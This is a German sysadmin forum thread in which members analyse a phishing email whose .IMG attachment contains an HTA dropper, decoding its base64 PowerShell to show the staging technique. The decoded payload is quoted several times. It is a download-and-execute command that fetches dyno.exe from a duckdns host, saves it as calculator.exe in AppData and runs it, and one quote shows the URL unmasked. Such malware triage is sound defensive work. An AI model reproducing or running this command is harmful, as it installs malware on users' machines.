Phishing Mail mit schädlichen Images in freier Wildbahn (.IMG Datei)

Mitglied: wolfble
Moin Moin an alle

Gestern bekam ich eine EMail mit irgendwelchen komischen Sepa Einzugsankündigungen die man angeblich der angehängten Datei entnehmen kann. Ging so
um 4k .. Autoteile ... ja ne ist klar als Verwaltung käuft man ja immer Autoteile im mittleren vierstelligen Bereich (wenn man nicht grade aus der Branche kommt).

Als Dateianhang war eine .IMG dran (Das hatte ich auch noch nicht, es halt ein Datenträgerimageformat wie .ISO). Größe so 1 MB ..

Das meiste war leer (Ich denke man wollte das nur künstlich aufbladen weil viele Scanner nur bis zu einer gewissen Größe scannen)

In der IMG war eine .HTA Datei mit folgendem Inhalt


Ok, man kann sich denken was hier versucht wird .. nachdem .ZIP und .RAR wohl kaum noch durchkommt nehmen wir halt was anderes zb. IMG. und hoffen das die .hta irgendwer dann anklickt. Und das läd dann über ein Powershell script Unfug nach.

Interessant wäre es ob man das wieder lesebar machen kann, dann wüsste man was genau von wo nachgeladen wird.

Content-Key: 1078421591

Url: https://administrator.de/contentid/1078421591

Ausgedruckt am: 22.09.2021 um 03:09 Uhr

Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 11:09:43 Uhr
Goto Top
Moin,

Da steht nur bas64-codiert drin:
invoke-webrEquEST -URi http://linkdXXX.duckdnsXXX.orgXXX/XXX11d/XXXdyno.exe -ouTfilE $ENV:ApPDATA\calculator.exe ; iNVoke-ExPREsSioN $env:AppDAta\calculator.exe

Der holt sich also eine dyno.exe udn speichert sie in Appdata als calculator.exe ab und ruft diese auf. Und damit das nciht auffällt, wird Powershell mit bypass udn noprofile aufgerufen.

lks

PS: Die X-e sind von mir, damit da nicht ein Depp einfach draufklickt.

PPS: Kann sein, daß beim Editieren der base64-Ausgabe (base64 -d) ich Zeichen verschluckt habe, aber das dürfte für das verständnis egal sein, was das Ding macht.

P3S: Das gehört zum kleinen Einmaleins des sicherheitsbewußten Admin, sowas selbst herauszufinden. :-) face-smile

P4S: Sowas landet im Fliegenfänger bei mir mehrmals täglich.

P5S:decode base64

Edit: beim editieren Ausgabe war der Parameter von invoke-expression veschwunden.
Mitglied: Fennek11
Fennek11 23.07.2021 aktualisiert um 10:06:31 Uhr
Goto Top
Es ist Base64:

$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64))
$DecodedText

und ergibt nach Entfernen einiger Tabs:

invoke-webrEquEST -URi ”http[:]//linkd.duckdns[.]org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe”

Fehlt da noch etwas?
Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 10:35:38 Uhr
Goto Top
Zitat von @Fennek11:

Es ist Base64:

invoke-webrEquEST -URi ”http://linkd.duckdns.org/11d/dyno.exe&rdquo" -ouTfilE ”$ENV:ApPDATA\calculator.exe”

Fehlt da noch etwas?

invoke-expression $env:AppDAta\calculator.exe :-) face-smile

lks

Edit: parameter von invoke-Expression ergänzt.
Mitglied: wolfble
wolfble 23.07.2021 um 10:14:12 Uhr
Goto Top
Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...
Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 um 10:16:57 Uhr
Goto Top
Zitat von @wolfble:

Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...

Mit dem Tool base64 das so ziemlich mit jeder Distribution dabei ist und auch unter Linux mit WSL oder cygwin zur verfügung steht.

Mit den online-Tools aus der google-Suche oben geht das natürlich auch. Man muß nur die Sonderzeichen geschickt interpretieren, die da zwischendrin stehen. :-) face-smile

lks
Mitglied: aqui
aqui 23.07.2021 um 10:21:09 Uhr
Goto Top
Mitglied: wolfble
wolfble 23.07.2021 um 10:26:39 Uhr
Goto Top
Ah ich sehs in meinem alter sieht man nicht mehr so gut ;-) face-wink .. die IP geht irgendwo zu ner Strato seite die werden sie dafür missbraucht haben und wenn das bemerkt wird wandern sie zu nächsten ist mit duckdns ja ken Problem .

Also wie immer .oO
Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 10:45:27 Uhr
Goto Top
Übrigens:

Bei Virustotal sind momentan nur 5 Scanner der Meinung, daß es Malware ist, wenn man die URL angibt. Wenn man die datei selbst hochlädt, sind es bei virustotal 10 Scanner, die Malware erkennen.


TGIF

lks

PS. Man sieht aktuell alle paar Minuten, wie immer mehr Scanner die Dateie als Malware detektieren.
Mitglied: aqui
aqui 23.07.2021 aktualisiert um 12:24:41 Uhr
Goto Top
Auf'm Mac darf er gerne mal Powershell versuchen... 🤣
Mitglied: Delta9
Delta9 23.07.2021 um 12:28:36 Uhr
Goto Top
Zitat von @aqui:

Auf'm Mac darf er gerne mal Powershell versuchen... 🤣

Es gibt doch Powershell auf dem MAC :-) face-smile
Mitglied: Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 12:32:50 Uhr
Goto Top
Zitat von @aqui:

Auf'm Mac darf er gerne mal Powershell versuchen... 🤣

Installieren von PowerShell unter macOS

lks

PS: Für pöhses unter MacOS reicht auch die bash (oder zsh).
Mitglied: aqui
aqui 23.07.2021 um 15:41:06 Uhr
Goto Top
zsh ist schöner ! ;-) face-wink
Mitglied: aqui
aqui 25.07.2021 aktualisiert um 12:58:10 Uhr
Goto Top
@wolfble
Wenn's das denn nun war bitte nicht vergessen den Thread dann auch zu schliessen !
https://administrator.de/faq/32
Mitglied: wolfble
wolfble 25.07.2021 um 15:51:40 Uhr
Goto Top
Wo ist das denn versteckt?
Mitglied: Ex0r2k16
Ex0r2k16 29.07.2021 um 15:00:31 Uhr
Goto Top
ich habe die Dinger schon vor nem Jahr in der Quarantäne gehabt. Mittlerweile habe ich .img verboten. Feddisch
Mitglied: aqui
aqui 29.07.2021 um 19:07:49 Uhr
Goto Top
Zeit auch den Thread dann langsam mal zu schliessen !
https://administrator.de/faq/32
Mitglied: wolfble
wolfble 31.07.2021 um 15:11:04 Uhr
Goto Top
Villeicht bin ich blind aber ich seh hier nichts um das zu tun 🤔
Heiß diskutierte Beiträge
tip
Outlook 2019 Konto hinzufügen - Kein Benutzername mehr bei IMAP Einstellungen - LösungFrankVor 23 StundenTippOutlook & Mail31 Kommentare

Eine weitere Kuriosität unter Office 2019 ist bei mir gerade hart aufgeschlagen. Ich wollte ein normales IMAP/SMTP Konto zu Outlook 2019 hinzufügen. Das war aber ...

question
Clonen einer SSD Platte auf eine grösserejensgebkenVor 1 TagFrageFestplatten, SSD, Raid9 Kommentare

Hallo Gemeinschaft habe in meinem Rechner eine alte SSD 128 und eine neu installierte mit Windows 10 drauf 512 GB nun möchte ich gerne die ...

question
Ablösung alte M.2 SSDUrx1974Vor 1 TagFrageFestplatten, SSD, Raid7 Kommentare

Hallo, ich habe in einem (anderen) Laptop eine ITE-ON CV3-8D128-11 128GB M2 / M.2 SSD 2280 drin. Ich wollte diese jetzt durch eine 1TB SSD ...

question
Dienst-PCs per Image sichern?Yan2021Vor 21 StundenFrageBackup11 Kommentare

Hallo Ihr Lieben ;-) So, Urlaub vorbei und schon kommt mal wieder eine Frage von mir. Wir haben hier so rund gerechnet 10 PCs. Da ...

general
VPN-Einwahl für UnternehmensnetzwerkjoergVor 1 TagAllgemeinLAN, WAN, Wireless12 Kommentare

Hallo zusammen, aktuell beschäftige ich mich mit der Frage, ob unsere aktuelle User-VPN-Lösung noch die Richtige ist oder ob es bessere Alternativen gibt. Wir setzen ...

question
Problem mit gespiegelten BackupsystemfisiyouVor 1 TagFrageCluster8 Kommentare

Hi liebe Community, Bin derzeit als Umschüler (Fisi) im Betriebspraktikum unterwegs. Mir wurde jetzt ein Problem mit unseren Backupstorage mitgeteilt, wo ich mir eine Lösung ...

question
Webseite signierenUserUWVor 22 StundenFrageInternet9 Kommentare

Gelegentlich möchte man auf einer Webseite kritische Daten veröffentlichen, zum Beispiel Checksummen von Dateien/Programmen oder den Fingerprint eines Schlüssels. Frage: Wie kann man diese Information ...

question
"Aktualisieren und Herunterfahren" nach Windows Update erzwingenFrM222Vor 21 StundenFrageWindows Update7 Kommentare

Hallo Zusammen, wir verteilen unsere Windows Updates über WSUS (2016) und haben hier inzwischen eigentlich einen ganz guten Stand. Die Updates werden sehr zügig auf ...